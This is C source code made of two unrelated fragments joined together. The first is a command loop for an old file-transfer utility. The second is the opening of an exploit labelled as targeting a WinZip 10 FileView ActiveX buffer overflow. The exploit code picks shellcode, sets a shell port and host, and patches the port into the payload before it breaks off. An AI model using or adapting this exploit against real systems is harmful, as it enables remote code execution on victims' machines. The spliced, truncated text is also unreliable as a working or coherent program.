interact() { int i, intrpt(); char cmd[80], *rest, *index(); for (;;) { if (firsttime++ == 0) { signal(SIGINT, intrpt, -1); setret(env); } if (cmdinp(cmd) < 0) return (0); rest = index(cmd, ' '); if (rest) *rest++ = '\0'; i = chkcmd(cmd); #ifdef DEBUG printf("command: %s, ind: %d\n", cmd, i); #endif switch (i) { default: errinp; break; case CMD_DIR: case CMD_LS: dispdir(); break; case CMD_RENAME: rename(rest); break; case CMD_OCOPY: copyc(rest, 0); break; case CMD_ICOPY: pip(rest, 0); break; case CMD_DELETE: case CMD_ERASE: delete(rest); break; case CMD_EXIT: case CMD_LOGOUT: return(0); case CMD_TYPE: copy(rest, stdout, 0); break; case CMD_HELP: help(); break; case CMD_OCCOPY: copyc(rest, 1); break; case CMD_ICCOPY: pip(rest,1); break; case CMD_DUMP: dump(rest); break; case CMD_UNIX: system(rest); break; case CMD_DISK: disk(); break; } } }
int main(int argc, char* argv[]){ unsigned long i, fd; int c, index, payg, paya, lhost; short shellport, shellport2; int ishell = 0, itarg = 0; char *buffer, *file, *img, *payload; static struct option options[] = { {"filename", 1, 0, 'f'}, {"imgname", 1, 0, 'i'}, {"target", 1, 0, 't'}, {"shellcode", 1, 0, 's'}, {"shellport", 1, 0, 'p'}, {"shellhost", 1, 0, 'd'}, {"help", 0, 0,'h'} }; printf("[ WinZip 10 <= 10.0.7245 FileView ActiveX overflow exploit\n"); while(c != -1){ c = getopt_long(argc,argv,"f:i:t:s:p:d:h",options,&index); switch(c){ case 'f': file = optarg; break; case 'i': img = optarg; break; case 't': itarg = 1; setret(optarg); if(strlen((char*)&ret) < 4){ fprintf(stderr,"[ Selected target contains a null address!\n"); exit(-1); } break; case 's': if(ishell==0){ payg = atoi(optarg); switch(payg){ case 0: printf("[ Using shellcode '%s' (%d bytes)\n",shellcodes[payg].name,strlen(shellcodes[payg].shellcode)); payload = malloc(strlen(shellcodes[payg].shellcode)+1); memset(payload,0,strlen(shellcodes[payg].shellcode)+1); memcpy((void*)payload,(void*)shellcodes[payg].shellcode,strlen(shellcodes[payg].shellcode)); shellport2 = 4444; ishell = 1; break; case 1: printf("[ Using shellcode '%s' (%d bytes)\n",shellcodes[payg].name,strlen(shellcodes[payg].shellcode)); payload = malloc(strlen(shellcodes[payg].shellcode)+1); memset(payload,0,strlen(shellcodes[payg].shellcode)+1); memcpy((void*)payload,(void*)shellcodes[payg].shellcode,strlen(shellcodes[payg].shellcode)); shellport2 = 4444; ishell = 1; break; default: printf("[ Invalid shellcode selection %d\n",payg); exit(0); break; } } break; case 'p': if(ishell==1){ if(shellcodes[payg].port > -1){ paya = strlen(payload); shellport = atoi(optarg); shellport2 = shellport; shellport =(shellport&0xff)<<8 | shellport>>8; memcpy((void*)&payload[shellcodes[payg].port],&shellport,sizeof(shellport)); if(paya > strlen(payload)) { printf("[ Error shellcode port introduces null bytes\n"); exit(1); } printf("[ Shellcode port changed to '%u'\n",atoi(optarg)); } else{ printf("[ (%s) port selection is ignored for current shellcode\n",optarg); } } else{